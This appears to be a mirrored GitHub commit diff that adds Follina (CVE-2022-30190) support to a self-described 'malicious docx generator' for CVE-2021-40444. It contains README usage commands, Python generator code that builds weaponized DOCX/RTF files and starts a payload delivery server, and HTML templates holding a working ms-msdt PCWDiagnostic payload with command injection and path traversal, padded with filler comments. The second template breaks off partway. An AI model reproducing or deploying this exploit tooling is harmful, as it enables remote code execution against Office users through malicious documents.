mirror of
https://github.com/klezVirus/CVE-2021-40444.git
synced 2024-11-23 14:00:48 +00:00
Add POC for POC CVE-2022-30190 : CVE 0-day MS Offic RCE aka msdt follina
This commit is contained in:
parent
a56b9a8e25
commit
8983af2c8f
6 changed files with 199 additions and 18 deletions
28
README.md
28
README.md
|
@ -2,6 +2,10 @@
|
||||||
|
|
||||||
Malicious docx generator to exploit CVE-2021-40444 (Microsoft Office Word Remote Code Execution), works with arbitrary DLL files.
|
Malicious docx generator to exploit CVE-2021-40444 (Microsoft Office Word Remote Code Execution), works with arbitrary DLL files.
|
||||||
|
|
||||||
|
### Update 31/05/2022 - CVE-2022-30190 - Follina
|
||||||
|
|
||||||
|
Now the generator is able to generate the document required to exploit also the "Follina" attack (leveraging ms-msdt).
|
||||||
|
|
||||||
# Background
|
# Background
|
||||||
|
|
||||||
Although many PoC are already around the internet, I guessed to give myself a run to weaponizing this vulnerability,
|
Although many PoC are already around the internet, I guessed to give myself a run to weaponizing this vulnerability,
|
||||||
|
@ -11,6 +15,7 @@ released a patch for this vulnerability.
|
||||||
So far, the only valuable resources I've seen to create a fully working generator are:
|
So far, the only valuable resources I've seen to create a fully working generator are:
|
||||||
* [Blog by Ret2Pwn](https://xret2pwn.github.io//CVE-2021-40444-Analysis-and-Exploit/)
|
* [Blog by Ret2Pwn](https://xret2pwn.github.io//CVE-2021-40444-Analysis-and-Exploit/)
|
||||||
* [Twit by j00sean](https://twitter.com/j00sean/status/1437390861499838466)
|
* [Twit by j00sean](https://twitter.com/j00sean/status/1437390861499838466)
|
||||||
|
* [Twit by wdormann](https://twitter.com/wdormann/status/1531250993127739392)
|
||||||
|
|
||||||
The above resources outline a lot of the requirements needed to create a full chain. To avoid repeating too much
|
The above resources outline a lot of the requirements needed to create a full chain. To avoid repeating too much
|
||||||
unnecessary information, I'll just summarize the relevant details.
|
unnecessary information, I'll just summarize the relevant details.
|
||||||
|
@ -117,18 +122,21 @@ To summarise:
|
||||||
|
|
||||||
The generator utility can currently reproduce the following attacks:
|
The generator utility can currently reproduce the following attacks:
|
||||||
|
|
||||||
| Attack | HTML Templates | Target | Delivery Method | Execution Method | Working |
|
| Attack | HTML Templates | Target | Delivery Method | Execution Method | Working |
|
||||||
|-------------------------------------------|---------------------|--------|-----------------|------------------|-----------------|
|
|------------------------------------------|---------------------|--------|-----------------|------------------|-----------------|
|
||||||
| Original version of the attack | cab-orig-* | WORD | DOCX | CAB + DLL | YES |
|
| Original version of the attack | cab-orig-* | WORD | DOCX | CAB + DLL | YES |
|
||||||
| j00sean IE-only attack | cab-orig-j00san | IE | HTML | CAB + DLL | YES |
|
| j00sean IE-only attack | cab-orig-j00san | IE | HTML | CAB + DLL | YES |
|
||||||
| My version without DLL | cab-uri-* | WORD | DOCX | CAB + JS/VBS | NO<sup>1</sup> |
|
| My version without DLL | cab-uri-* | WORD | DOCX | CAB + JS/VBS | NO<sup>1</sup> |
|
||||||
| Eduardo B. "CABless" attack using RAR | cabless-rar-* | WORD | RAR | WSF | YES |
|
| Eduardo B. "CABless" attack using RAR | cabless-rar-* | WORD | RAR | WSF | YES |
|
||||||
| Modified j00sean attack + HTML smuggling | cabless-smuggling-* | IE | HTML | JS/VBS | YES<sup>2</sup> |
|
| Modified j00sean attack + HTML smuggling | cabless-smuggling-* | IE | HTML | JS/VBS | YES<sup>2</sup> |
|
||||||
|
| Follina attack | cabless-msdt-* | WORD | HTML | MSDT + PS | YES<sup>3</sup> |
|
||||||
|
|
||||||
_<sup>1</sup>The CAB is not downloaded properly in some environments_
|
_<sup>1</sup>The CAB is not downloaded properly in some environments_
|
||||||
|
|
||||||
_<sup>2</sup>The user needs to click on "Save" to download the file on IE_
|
_<sup>2</sup>The user needs to click on "Save" to download the file on IE_
|
||||||
|
|
||||||
|
_<sup>3</sup>Not really working on all Windows/MS Word versions_
|
||||||
|
|
||||||
# CAB file parser
|
# CAB file parser
|
||||||
|
|
||||||
The utility `cab_parser.py` can be used to see the headers of the exploit file, but don't consider this a full
|
The utility `cab_parser.py` can be used to see the headers of the exploit file, but don't consider this a full
|
||||||
|
@ -202,6 +210,12 @@ python generator.py -u http://127.0.0.1 -P test\job-jscript.wsf --no-cab --host
|
||||||
```
|
```
|
||||||
python generator.py -u http://127.0.0.1 -P test\calc.js --no-cab --host -t
|
python generator.py -u http://127.0.0.1 -P test\calc.js --no-cab --host -t
|
||||||
```
|
```
|
||||||
|
*
|
||||||
|
* Generate the CABless exploit leveraging MS-MSDT (Follina attack), in both DOCX and RTF docs
|
||||||
|
|
||||||
|
```
|
||||||
|
python generator.py -u http://127.0.0.1 -P test\calc.ps1 --no-cab --host --convert
|
||||||
|
```
|
||||||
|
|
||||||
# Credits
|
# Credits
|
||||||
|
|
||||||
|
|
57
generator.py
57
generator.py
|
@ -19,6 +19,7 @@ import tempfile
|
||||||
import time
|
import time
|
||||||
import traceback
|
import traceback
|
||||||
from pathlib import Path
|
from pathlib import Path
|
||||||
|
import win32com.client
|
||||||
|
|
||||||
from cab_parser import Cab
|
from cab_parser import Cab
|
||||||
from in_place import InPlace
|
from in_place import InPlace
|
||||||
|
@ -161,6 +162,8 @@ def get_file_extension_based_uri(exploit, no_cab=False):
|
||||||
return exploit
|
return exploit
|
||||||
elif exploit in [".hta", ".js", ".vbs", ".wsf", ".hta"]:
|
elif exploit in [".hta", ".js", ".vbs", ".wsf", ".hta"]:
|
||||||
return ".wsf"
|
return ".wsf"
|
||||||
|
else:
|
||||||
|
return "ms-msdt"
|
||||||
|
|
||||||
|
|
||||||
def get_mime_type(exploit):
|
def get_mime_type(exploit):
|
||||||
|
@ -176,9 +179,11 @@ def get_mime_type(exploit):
|
||||||
return "text/plain"
|
return "text/plain"
|
||||||
elif exploit == ".wsf":
|
elif exploit == ".wsf":
|
||||||
return "text/xml"
|
return "text/xml"
|
||||||
|
else:
|
||||||
|
return "text/plain"
|
||||||
|
|
||||||
|
|
||||||
def generate_payload(payload, server_url, basename, copy_to=None, no_cab=False):
|
def generate_payload(payload, server_url, basename, copy_to=None, no_cab=False, convert=False):
|
||||||
# Current Working Directory
|
# Current Working Directory
|
||||||
working_directory = Path(__file__).parent
|
working_directory = Path(__file__).parent
|
||||||
|
|
||||||
|
@ -201,14 +206,16 @@ def generate_payload(payload, server_url, basename, copy_to=None, no_cab=False):
|
||||||
|
|
||||||
exploit = os.path.splitext(args.payload)[1]
|
exploit = os.path.splitext(args.payload)[1]
|
||||||
|
|
||||||
if no_cab and exploit != ".wsf":
|
if no_cab and exploit not in [".wsf", ".ps1"]:
|
||||||
print("[-] CAB-less version chosen, only .wsf is currently working")
|
print("[-] CAB-less version chosen, only .wsf and .ps1 are currently working")
|
||||||
exit(1)
|
exit(1)
|
||||||
|
|
||||||
lolbin = exploit not in [".dll"]
|
lolbin = exploit not in [".dll", ".ps1"]
|
||||||
|
|
||||||
if exploit == ".wsf" and no_cab:
|
if exploit == ".wsf" and no_cab:
|
||||||
id = "cabless-rar-"
|
id = "cabless-rar-"
|
||||||
|
elif exploit == ".ps1" and no_cab:
|
||||||
|
id = "cabless-msdt-"
|
||||||
elif lolbin and no_cab:
|
elif lolbin and no_cab:
|
||||||
id = "cabless-smuggling-"
|
id = "cabless-smuggling-"
|
||||||
elif lolbin:
|
elif lolbin:
|
||||||
|
@ -268,7 +275,10 @@ def generate_payload(payload, server_url, basename, copy_to=None, no_cab=False):
|
||||||
print('[*] Crafting Relationships to point to HTML/CAB/JS Hosting Server...')
|
print('[*] Crafting Relationships to point to HTML/CAB/JS Hosting Server...')
|
||||||
with InPlace(str(tmp_path.joinpath("word").joinpath("_rels").joinpath('document.xml.rels'))) as rels:
|
with InPlace(str(tmp_path.joinpath("word").joinpath("_rels").joinpath('document.xml.rels'))) as rels:
|
||||||
xml_content = rels.read()
|
xml_content = rels.read()
|
||||||
xml_content = xml_content.replace('<EXPLOIT_HOST_HERE>', f'{server_url}/{html_final_file.name}')
|
if exploit != ".ps1":
|
||||||
|
xml_content = xml_content.replace('<EXPLOIT_HOST_HERE>', f'{server_url}/{html_final_file.name}')
|
||||||
|
else:
|
||||||
|
xml_content = xml_content.replace('mhtml:<EXPLOIT_HOST_HERE>!x-usc:<EXPLOIT_HOST_HERE>', f'{server_url}/{html_final_file.name}!')
|
||||||
# xml_content = xml_content.replace('<INF_CHANGE_HERE>', inf_file.name)
|
# xml_content = xml_content.replace('<INF_CHANGE_HERE>', inf_file.name)
|
||||||
rels.write(xml_content)
|
rels.write(xml_content)
|
||||||
|
|
||||||
|
@ -316,6 +326,7 @@ def generate_payload(payload, server_url, basename, copy_to=None, no_cab=False):
|
||||||
content = content.replace('<RAR_CHANGE_HERE>', f"{rar_file.name}")
|
content = content.replace('<RAR_CHANGE_HERE>', f"{rar_file.name}")
|
||||||
content = content.replace('<URI_SCHEME_HERE>', get_file_extension_based_uri(exploit))
|
content = content.replace('<URI_SCHEME_HERE>', get_file_extension_based_uri(exploit))
|
||||||
content = content.replace('<BASE64_DATA_HERE>', b64_payload)
|
content = content.replace('<BASE64_DATA_HERE>', b64_payload)
|
||||||
|
content = content.replace('<PAYLOAD_HERE>', payload_content.decode())
|
||||||
content = content.replace('<MIME_TYPE_HERE>', get_mime_type(exploit))
|
content = content.replace('<MIME_TYPE_HERE>', get_mime_type(exploit))
|
||||||
content = content.replace('<FIRST_LETTER>', get_file_extension_based_uri(exploit)[1])
|
content = content.replace('<FIRST_LETTER>', get_file_extension_based_uri(exploit)[1])
|
||||||
content = content.replace('<SECOND_LETTER>', get_file_extension_based_uri(exploit)[2])
|
content = content.replace('<SECOND_LETTER>', get_file_extension_based_uri(exploit)[2])
|
||||||
|
@ -324,6 +335,12 @@ def generate_payload(payload, server_url, basename, copy_to=None, no_cab=False):
|
||||||
|
|
||||||
print(f'[+] Success! MS Word Document stored at: {word_doc}')
|
print(f'[+] Success! MS Word Document stored at: {word_doc}')
|
||||||
|
|
||||||
|
if convert:
|
||||||
|
if convert_to_rtf(word_doc):
|
||||||
|
print(f'[+] Success! MS Word Document was converted to RTF!')
|
||||||
|
else:
|
||||||
|
print(f'[-] ERROR. MS Word Document could not be converted to RTF.')
|
||||||
|
|
||||||
if exploit == ".wsf" and no_cab:
|
if exploit == ".wsf" and no_cab:
|
||||||
print(f"[*] Generating RAR file {rar_file.name}... and pushing it to 'Downloads', to emulate user download")
|
print(f"[*] Generating RAR file {rar_file.name}... and pushing it to 'Downloads', to emulate user download")
|
||||||
rar_dest = Path(os.getenv("USERPROFILE")).joinpath("Downloads").joinpath(rar_file.name)
|
rar_dest = Path(os.getenv("USERPROFILE")).joinpath("Downloads").joinpath(rar_file.name)
|
||||||
|
@ -336,10 +353,10 @@ def generate_payload(payload, server_url, basename, copy_to=None, no_cab=False):
|
||||||
return html_final_file.name
|
return html_final_file.name
|
||||||
|
|
||||||
|
|
||||||
def start_server(lport, directory: Path):
|
def start_server(ip, port, directory: Path):
|
||||||
this = Path(__file__).parent.joinpath("util").joinpath("server.py")
|
this = Path(__file__).parent.joinpath("util").joinpath("server.py")
|
||||||
subprocess.Popen(
|
subprocess.Popen(
|
||||||
f'start /D "{directory.absolute()}" "CVE-2021-40444 Payload Delivery Server" cmd /c python "{this.absolute()}" localhost {lport}',
|
f'start /D "{directory.absolute()}" "CVE-2021-40444 Payload Delivery Server" cmd /c python "{this.absolute()}" {ip} {port}',
|
||||||
shell=True,
|
shell=True,
|
||||||
close_fds=True,
|
close_fds=True,
|
||||||
stderr=subprocess.DEVNULL,
|
stderr=subprocess.DEVNULL,
|
||||||
|
@ -363,6 +380,21 @@ def clean():
|
||||||
pass
|
pass
|
||||||
|
|
||||||
|
|
||||||
|
def convert_to_rtf(filename):
|
||||||
|
new_file = os.path.splitext(filename)[0] + ".rtf"
|
||||||
|
try:
|
||||||
|
word = win32com.client.Dispatch("Word.application")
|
||||||
|
word.Visible = False
|
||||||
|
wordDoc = word.Documents.Open(str(Path(filename).absolute()))
|
||||||
|
# wdFormatRTF = 6
|
||||||
|
wordDoc.SaveAs2(str(Path(new_file).absolute()), FileFormat=6)
|
||||||
|
wordDoc.Close()
|
||||||
|
return True
|
||||||
|
except:
|
||||||
|
traceback.print_exc()
|
||||||
|
return False
|
||||||
|
|
||||||
|
|
||||||
def validate_filename(filename):
|
def validate_filename(filename):
|
||||||
# Required length for the file name
|
# Required length for the file name
|
||||||
required_length = 12
|
required_length = 12
|
||||||
|
@ -391,6 +423,8 @@ if __name__ == '__main__':
|
||||||
help="Use the CAB-less version of the exploit")
|
help="Use the CAB-less version of the exploit")
|
||||||
parser.add_argument('-t', '--test', action='store_true', default=False, required=False,
|
parser.add_argument('-t', '--test', action='store_true', default=False, required=False,
|
||||||
help="Open IExplorer to test the final HTML file")
|
help="Open IExplorer to test the final HTML file")
|
||||||
|
parser.add_argument('-x', '--convert', action='store_true', default=False, required=False,
|
||||||
|
help="Convert DOCX into RTF format")
|
||||||
|
|
||||||
args = parser.parse_args()
|
args = parser.parse_args()
|
||||||
|
|
||||||
|
@ -401,8 +435,9 @@ if __name__ == '__main__':
|
||||||
server = args.url
|
server = args.url
|
||||||
|
|
||||||
port = 80
|
port = 80
|
||||||
|
ip = "127.0.0.1"
|
||||||
try:
|
try:
|
||||||
scheme, ip = server.split(":")[0], server.replace("//", "/").split("/")[1]
|
scheme, ip = server.split(":")[0], server.replace("//", "/").split("/")[1].split(":")[0]
|
||||||
if scheme == "http":
|
if scheme == "http":
|
||||||
port = 80
|
port = 80
|
||||||
elif scheme == "https":
|
elif scheme == "https":
|
||||||
|
@ -420,15 +455,15 @@ if __name__ == '__main__':
|
||||||
|
|
||||||
try:
|
try:
|
||||||
html = generate_payload(payload=args.payload, server_url=server, basename=filename, copy_to=args.copy_to,
|
html = generate_payload(payload=args.payload, server_url=server, basename=filename, copy_to=args.copy_to,
|
||||||
no_cab=args.no_cab)
|
no_cab=args.no_cab, convert=args.convert)
|
||||||
except (SystemExit, KeyboardInterrupt):
|
except (SystemExit, KeyboardInterrupt):
|
||||||
exit(1)
|
exit(1)
|
||||||
except:
|
except:
|
||||||
traceback.print_exc()
|
traceback.print_exc()
|
||||||
exit(1)
|
exit(1)
|
||||||
if args.host and html:
|
if args.host and html:
|
||||||
print(f'[*] Hosting HTML Exploit at {args.url}:{port}/{html}...')
|
print(f'[*] Hosting HTML Exploit at {ip}:{port}/{html}...')
|
||||||
start_server(lport=port, directory=Path(__file__).parent.joinpath("srv"))
|
start_server(ip=ip, port=port, directory=Path(__file__).parent.joinpath("srv"))
|
||||||
if args.test:
|
if args.test:
|
||||||
if os.path.splitext(args.payload)[1] != ".wsf":
|
if os.path.splitext(args.payload)[1] != ".wsf":
|
||||||
print(f"[-] IE testing might not compatible with {os.path.splitext(args.payload)[1]}")
|
print(f"[-] IE testing might not compatible with {os.path.splitext(args.payload)[1]}")
|
||||||
|
|
|
@ -1,2 +1,3 @@
|
||||||
in_place
|
in_place
|
||||||
werkzeug
|
werkzeug
|
||||||
|
pywin32
|
65
template/cabless-msdt-sample1.html
Normal file
65
template/cabless-msdt-sample1.html
Normal file
|
@ -0,0 +1,65 @@
|
||||||
|
<!DOCTYPE html>
|
||||||
|
<html lang="en">
|
||||||
|
<head>
|
||||||
|
<meta charset="UTF-8">
|
||||||
|
<meta http-equiv="Expires" content="-1">
|
||||||
|
<meta http-equiv="X-UA-Compatible" content="IE=11">
|
||||||
|
<title>CVE-2021-40444 2 - The return</title>
|
||||||
|
</head>
|
||||||
|
<body>
|
||||||
|
<script>
|
||||||
|
|
||||||
|
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
|
||||||
|
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
|
||||||
|
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
|
||||||
|
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
|
||||||
|
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
|
||||||
|
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
|
||||||
|
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
|
||||||
|
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
|
||||||
|
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
|
||||||
|
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
|
||||||
|
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
|
||||||
|
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
|
||||||
|
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
|
||||||
|
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
|
||||||
|
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
|
||||||
|
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
|
||||||
|
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
|
||||||
|
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
|
||||||
|
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
|
||||||
|
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
|
||||||
|
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
|
||||||
|
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
|
||||||
|
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
|
||||||
|
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
|
||||||
|
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
|
||||||
|
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
|
||||||
|
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
|
||||||
|
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
|
||||||
|
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
|
||||||
|
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
|
||||||
|
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
|
||||||
|
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
|
||||||
|
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
|
||||||
|
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
|
||||||
|
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
|
||||||
|
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
|
||||||
|
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
|
||||||
|
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
|
||||||
|
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
|
||||||
|
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
|
||||||
|
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
|
||||||
|
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
|
||||||
|
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
|
||||||
|
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
|
||||||
|
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
|
||||||
|
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
|
||||||
|
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
|
||||||
|
|
||||||
|
|
||||||
|
location.href = "ms-msdt:/id PCWDiagnostic /skip force /param \"IT_RebrowseForFile=cal?c IT_LaunchMethod=ContextMenu IT_SelectProgram=NotListed IT_BrowseForFile=h$(<PAYLOAD_HERE>)i//../../../../../../../../../../../../../../../../Windows/System32/mpsigstub.exe IT_AutoTroubleshoot=ts_AUTO\"";
|
||||||
|
</script>
|
||||||
|
|
||||||
|
</body>
|
||||||
|
</html>
|
65
template/cabless-msdt-sample2.html
Normal file
65
template/cabless-msdt-sample2.html
Normal file
|
@ -0,0 +1,65 @@
|
||||||
|
<!DOCTYPE html>
|
||||||
|
<html lang="en">
|
||||||
|
<head>
|
||||||
|
<meta charset="UTF-8">
|
||||||
|
<meta http-equiv="Expires" content="-1">
|
||||||
|
<meta http-equiv="X-UA-Compatible" content="IE=11">
|
||||||
|
<title>CVE-2021-40444 2 - The return</title>
|
||||||
|
</head>
|
||||||
|
<body>
|
||||||
|
<script>
|
||||||
|
|
||||||
|
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
|
||||||
|
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
|
||||||
|
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
|
||||||
|
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
|
||||||
|
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
|
||||||
|
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
|
||||||
|
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
|
||||||
|
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
|
||||||
|
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
|
||||||
|
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
|
||||||
|
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
|
||||||
|
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
|
||||||
|
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
|
||||||
|
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
|
||||||
|
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
|
||||||
|
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
|
||||||
|
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
|
||||||
|
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
|
||||||
|
